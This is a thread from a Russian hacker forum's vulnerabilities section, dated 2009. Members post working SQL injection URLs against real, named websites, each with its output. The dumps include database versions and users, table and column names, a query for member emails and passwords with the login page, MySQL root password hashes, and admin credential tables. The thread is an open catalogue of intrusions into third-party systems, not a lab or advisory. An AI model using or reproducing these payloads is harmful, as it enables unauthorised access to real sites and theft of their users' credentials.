ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

paramountcenter.org
  #7781  
Старый 12.02.2009, 23:01
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию paramountcenter.org

Код:
http://www.paramountcenter.org/screen.php?id=-323+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
5.0.67-log

PR: 5
 
Ответить с цитированием

  #7782  
Старый 12.02.2009, 23:05
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

SuperADSL
Код:
http://adsl.superonline.com/modem_detail.php?id=-11'+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8/*
user(): superadsl@212.252.113.115
database(): superadsl
version(): 5.0.41-log 4

PR=5

table: user
поля: id:ad:username:sifre:durum

table: users
поля: Id:u_status:so_anket:so_anket_log:so_anket_request

Код:
http://www.stellenlinks.ch/link.php?id=-11'+union+select+1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8,9,10/*
user(): web788@localhost
database(): usr_web788_1
version(): 5.0.45

PR=6
 
Ответить с цитированием

  #7783  
Старый 12.02.2009, 23:07
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.marinarii.ro/nave-de-istorie.php?id=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user())--&name=Bricul_Mircea_



Database Version: 5.0.67-community-log
Database name: marinari_marinarii
User name: marinari_db@localhost
 
Ответить с цитированием

  #7784  
Старый 12.02.2009, 23:48
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.corazonhealth.co.uk/screen.php?id=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),73),73),3,4,5/*
4.1.11
вывод во флеш о_О
 
Ответить с цитированием

  #7785  
Старый 13.02.2009, 00:31
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

www.tabsheaven.net довольно известный в сети сайт с гитарной табулатурой)

Цитата:
http://www.tabsheaven.net/tab.php?id=-41872'+union+select+1,2,3,concat_ws(0x3a,version() ,user(),database()),5,6,7,8,9,10,11,12+--+
юзер - gh123400@localhost
бд - gh123401db, gh123400db
версия MySQL - 5.0.22

таблицы из бд gh123400db:
Цитата:
Links
Messages
MinipollAnswers
MinipollQuestions
News
Tabs
textinterprets
texttabs
таблицы из бд gh123401db:
Цитата:
DiscussionTopics
Interprets
Links
Messages
MinipollAnswers
MinipollQuestions
News
Tabs
textinterprets
texttabs
 
Ответить с цитированием

  #7786  
Старый 13.02.2009, 00:34
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

drivermagazine.ca - PR3
Код:
http://drivermagazine.ca/phpcode/web/view_article.php?art_id=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
DB_Ver : 4.1.22-standard
DB_User: driverma_driver@localhost
DB : driverma_dm

База данных юзеров:member
Интересные поля: email,password
Запрос для примера:
Код:
http://drivermagazine.ca/phpcode/web/view_article.php?art_id=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,email,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+members+limit+0,1--
Войти можно тут:
Код:
http://www.drivermagazine.ca/phpcode/web/sub.php
 
Ответить с цитированием

Oracle
  #7787  
Старый 13.02.2009, 00:45
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию Oracle

http://neuron.md/catalog.php?param_ctid=20738&param_sctid=-20741+union+select+null,null,to_char(user)+from+sy s.dual--



user : WEBNEURON



http://neuron.md/catalog.php?param_ctid=20738&param_sctid=-20741+union+select+null,null,TABLE_NAME+from+SYS.A LL_TABLES+WHERE++ROWNUM+%3C=+5--


крутите....


http://neuron.md/catalog.php?param_ctid=20738&param_sctid=-20741+union+select+null,null,chr(207)||chr(240)||c hr(232)||chr(226)||chr(229)||chr(242)||chr(32)||ch r(226)||chr(241)||chr(229)||chr(236)||chr(32)||chr (238)||chr(242)||chr(32)||chr(195)||chr(238)||chr( 240)||chr(229)||chr(226)||chr(224)||chr(32)||chr(3 3)||chr(33)||chr(33)+from+dual--

Улыбнитесь

Последний раз редактировалось Gorev; 13.02.2009 в 00:50..
 
Ответить с цитированием

  #7788  
Старый 13.02.2009, 01:23
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

improvemyhome.ca - PR5
Код:
http://www.improvemyhome.ca/article_detail_page.php?art_id=254149&type=-2222+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6/*
DB_Ver : 5.0.41-log
DB_User : snapsync@localhost (имеет файловые привилегии, читать файлы по крайней мере точно может)
DB : renovons_ag

Пользователи из mysql.user
root:745ae3fb13dd6c1a
root:358b5bdd4c573f2d
root:358b5bdd4c573f2d
snapsync:0285e4f0029d984d
backup:4906447b2de0dc5d
 
Ответить с цитированием

  #7789  
Старый 13.02.2009, 03:15
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Художественная Галерея «Виктория»

Код:
http://gallery-victoria.ru/painters'+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0--+/
 
Ответить с цитированием

  #7790  
Старый 13.02.2009, 07:08
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Europesolidaire.eu
Цитата:
http://www.europesolidaire.eu/article.php?article_id=-179+union+select+concat_ws(0x3a,0x3a3a,email_user, password_user,gecos_user)+from+user_table+limit+1, 1#
Mainbrace.com.au
Цитата:
http://www.mainbrace.com.au/print.php?page=article.php&id=-12+union+select+1,version(),3,4,5,6,7,8/*
Thestartbusiness.com
Цитата:
http://thestartbusiness.com/links/browse.php?id=7+union+select+concat_ws(0x3a,userna me,password)+from+admin
есть табла админ с сообтетсвующими паролями

Последний раз редактировалось jokester; 13.02.2009 в 11:47.. Причина: Uab.edu ,Mcli.dist.maricopa.edu, honors.uoregon.edu ---БОЯНЫ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ